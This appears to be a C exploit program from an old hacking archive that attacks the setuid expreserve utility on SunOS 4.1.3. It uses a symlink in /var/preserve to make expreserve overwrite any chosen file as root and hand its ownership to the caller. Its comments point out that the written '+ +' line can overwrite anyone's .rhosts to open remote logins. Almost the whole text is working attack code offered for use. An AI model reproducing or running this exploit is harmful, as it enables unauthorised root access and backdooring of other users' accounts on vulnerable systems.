home *** CD-ROM | disk | FTP | other *** search
- *
- * Exploit a security hole in expreserve on sun4.1.3
- * <program> filename
- * overwrites filename as root with garbage, chown's to you
- * (note, a 4.1.1 test overwrote with no chown
- * the first 4 characters written are "+ +\n"
- * which can be used to overwrite anyones .rhosts as root)
- *
- * Tim N.
- */
-
- #include <pwd.h>
- #include <fcntl.h>
-
- #define HBLKS 2
- #define FNSIZE 128
- #define BLKS 900
-
- typedef struct {
- time_t time;
- int uid;
- int flines;
- char name[FNSIZE];
- short Blocks[BLKS];
- short encrypted;
- } header;
-
-
- main(argc,argv)
- int argc;
- char **argv;
- {
- int p,u;
- header H;
- struct passwd *pw;
- char buf[100],*dest;
-
- if(argc!=2) {
- printf("usage: %s destination\n",argv[0]);
- exit(1);
- }
- dest = argv[1];
- p = getpid();
- pw = getpwuid(getuid());
- sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
- symlink(dest,buf);
- close(0);
- if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
- printf("Cant open Ex (temp file)\n");
- exit(2);
- }
- /* fill out header so that expre thinks its legit */
- H.time = 12345; /* who cares */
- strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/
- strcpy(H.name,"NoName");
- H.flines = 0;
- H.uid = getuid();
- H.Blocks[0] = HBLKS;
- H.Blocks[1] = HBLKS+1;
- write(0,&H,sizeof(H));
- lseek(0,0,0);
- printf("Made temp file 'Ex'. You can remove it when done.\n");
- execl("/usr/lib/expreserve","expreserve",0);
- printf("Couldnt exec!\n");
- }
- /* www.hack.co.za [2000]*/
